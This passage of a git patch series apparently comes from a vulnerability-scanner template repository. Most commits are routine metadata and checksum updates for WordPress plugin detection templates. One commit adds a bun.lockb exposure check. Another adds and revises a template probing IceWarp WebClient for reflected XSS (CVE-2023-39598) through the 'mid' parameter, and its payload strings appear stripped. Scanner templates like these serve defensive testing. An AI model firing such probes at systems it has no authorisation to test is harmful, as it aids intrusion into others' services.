b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 2f07a543f60ef244f27a28bb437acd3938a09f1f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:05:54 +0000 Subject: [PATCH 0249/1090] Auto Generated New Template Addition List [Sat Sep 9 17:05:54 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b0cae2302d..e07dec6dba 100644 --- a/.new-additions +++ b/.new-additions @@ -34,6 +34,7 @@ http/misconfiguration/php-debugbar-exposure.yaml http/osint/gist.yaml http/takeovers/lemlist-takeover.yaml http/technologies/burp-collaborator-detect.yaml +http/technologies/honeypot-detect.yaml http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml From 2710fe2aa29da140b6966d953692dffcc2de8f81 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:06:03 +0000 Subject: [PATCH 0250/1090] Auto Generated Templates Checksum [Sat Sep 9 17:06:03 UTC 2023] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 762e301b9f..7cb2314081 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:a255b183d8ee189e6f919c3e3fff343dcdcce38f -cves.json-checksum.txt:f361a47242f5b3696d068c53446bc7420179fe11 +cves.json:a48f2da2d6835e4ae6f052719576ef1d926e5daa +cves.json-checksum.txt:8da30c988970c728c8fcfdd22abc8e4095f9ca9e dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -1238,7 +1238,7 @@ http/cves/2019/CVE-2019-11013.yaml:7366a212d9a1754e91010ff5f85c343059edc9d7 http/cves/2019/CVE-2019-11248.yaml:17b65cc75baa9db48c8890da4d0d6b26ea0a303e http/cves/2019/CVE-2019-11370.yaml:1595e81fe1302238e581ff5a0344f98bc447a90d http/cves/2019/CVE-2019-11510.yaml:e40506f727b6461d1f669bc6a516fc6008eeff20 -http/cves/2019/CVE-2019-11580.yaml:de5dc28e9140c88a4a13e3cb4af115655375e614 +http/cves/2019/CVE-2019-11580.yaml:785288f1c24d27b95ede4b020e7b82b9731e66a6 http/cves/2019/CVE-2019-11581.yaml:d3dff6113063409b50a4d1dafc6509e1d54491bc http/cves/2019/CVE-2019-11869.yaml:f817212310482f8e070391f63701c3fde5cc5ef3 http/cves/2019/CVE-2019-12276.yaml:27f893f7a856e8a4a18ad436113c1c97fb398db6 @@ -5602,6 +5602,7 @@ http/technologies/hashicorp-vault-detect.yaml:629db92f039b6f56bf65d138c2702c9cfd http/technologies/herokuapp-detect.yaml:ee249498788c8c4f93fc7b52211df4ef992633d3 http/technologies/hetzner-cloud-detect.yaml:54a8398aac1946a6938dfc956e1d5da97c72a3bf http/technologies/hikvision-detect.yaml:fcec8f20899eaaaf3692bf70d60e0191a05675e9 +http/technologies/honeypot-detect.yaml:b77489f9c9068d1334b09b043b33785a97760d08 http/technologies/hp-blade-admin-detect.yaml:5b19e0e7cdd90ffb604add3b8025aa0b6c22392f http/technologies/hp-media-vault-detect.yaml:d8a766665ce4cbe3a42ef25bd7e68325cb83b24a http/technologies/hugo-detect.yaml:324f4b71e9bfa57a15510099f88eb6da267f452f @@ -7055,7 +7056,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:e13dba8049ee09cc6d36f21aaa41581f057bee32 +templates-checksum.txt:d00ddafb19be8038267e33fa0effa090189d40a7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 63bcb69d6fff2a76a592b5e262b0549f1588eacc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:06:23 +0000 Subject: [PATCH 0251/1090] TemplateMan Update [Sat Sep 9 17:06:23 UTC 2023] :robot: --- http/cves/2019/CVE-2019-11580.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index aba3dc5b68..2c47b08b8c 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - epss-score: 0.97491 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* + epss-score: 0.97491 metadata: - max-request: 1 + max-request: 2 + product: crowd shodan-query: http.component:"Atlassian Jira" vendor: atlassian - product: crowd tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth variables: From 3368f6dc5571b7b43a7ae9b685193f63c9fe1346 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 9 Sep 2023 21:28:09 +0200 Subject: [PATCH 0252/1090] Create bun-lock.yaml --- http/exposures/files/bun-lock.yaml | 33 ++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposures/files/bun-lock.yaml diff --git a/http/exposures/files/bun-lock.yaml b/http/exposures/files/bun-lock.yaml new file mode 100644 index 0000000000..32815f2829 --- /dev/null +++ b/http/exposures/files/bun-lock.yaml @@ -0,0 +1,33 @@ +id: bun-lock + +info: + name: Bun Lock File Disclosure + author: noraj + severity: info + description: | + The bun.lockb file is similar to the package-lock.json file used by npm or the yarn.lock file used by Yarn. It serves as a lock file that ensures consistent and reproducible installations of dependencies across different environments. + reference: + - https://bun.sh/docs/install/lockfile + metadata: + max-request: 1 + verified: true + shodan-query: html:"bun.lockb" + tags: exposure,files,node,npm,bun + +http: + - method: GET + path: + - "{{BaseURL}}/bun.lockb" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bun-lockfile-format-v0" + - "#!/usr/bin/env bun" + condition: or + + - type: status + status: + - 200 From 66359940dad9228bf90a837aa2a9383058ad12c8 Mon Sep 17 00:00:00 2001 From: Imjust0 <38808999+muthumohanprasath@users.noreply.github.com> Date: Sun, 10 Sep 2023 01:55:23 +0530 Subject: [PATCH 0253/1090] Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. --- http/cve/2023/CVE-2023-39598.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/cve/2023/CVE-2023-39598.yaml diff --git a/http/cve/2023/CVE-2023-39598.yaml b/http/cve/2023/CVE-2023-39598.yaml new file mode 100644 index 0000000000..9bf1ee4376 --- /dev/null +++ b/http/cve/2023/CVE-2023-39598.yaml @@ -0,0 +1,23 @@ +id: icewarp-xss-cve-2023-39598 +info: + name: IceWarp Email Client XSS + author: Imjust0 + severity: medium + description: Checking for the XSS on the IceWarp Email Client Application + tags: xss,cve2023,icewarp + reference: + - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c + - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 +http: + - method: GET + path: + - '{{BaseURL}}/webmail/?mid=muthu">' + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: status + status: + - 200 From 7d0b5cf19e258352a0e08b801734c06fac5a2289 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 10 Sep 2023 06:56:17 +0530 Subject: [PATCH 0254/1090] minor update --- http/cve/2023/CVE-2023-39598.yaml | 29 ++++++++++++++++++++--------- 1 file changed, 20 insertions(+), 9 deletions(-) diff --git a/http/cve/2023/CVE-2023-39598.yaml b/http/cve/2023/CVE-2023-39598.yaml index 9bf1ee4376..7c35af6ffa 100644 --- a/http/cve/2023/CVE-2023-39598.yaml +++ b/http/cve/2023/CVE-2023-39598.yaml @@ -1,23 +1,34 @@ -id: icewarp-xss-cve-2023-39598 +id: CVE-2023-39598 + info: - name: IceWarp Email Client XSS + name: IceWarp Email Client - Cross Site Scripting author: Imjust0 severity: medium - description: Checking for the XSS on the IceWarp Email Client Application - tags: xss,cve2023,icewarp + description: | + Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter. reference: - - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 + - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c + - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 + metadata: + max-request: 1 + shodan-query: title:"icewarp" + verified: "true" + tags: cve,cve2023,xss,icewarp + http: - method: GET path: - - '{{BaseURL}}/webmail/?mid=muthu">' + - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}">' + matchers-condition: and matchers: - type: word words: - - "" + - "" + - "icewarp" + condition: and + - type: status status: - 200 From e9e7a7e3b87c8afa4060ee80e624da65f91c6616 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 04:02:29 +0000 Subject: [PATCH 0255/1090] Auto WordPress Plugins Update [Sun Sep 10 04:02:29 UTC 2023] :robot: --- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 204 files changed, 4 insertions(+), 204 deletions(-) diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 1f14f76936..6a79ddb31f 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.4.5 \ No newline at end of file +9.4.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 554960d317..c355d6e218 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.9.6 \ No newline at end of file +5.10.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 0c66a4898e..31235d1a58 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -10.6 \ No newline at end of file +10.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 6a6a6933b0..79f0f24046 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.13.1 \ No newline at end of file +4.13.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml 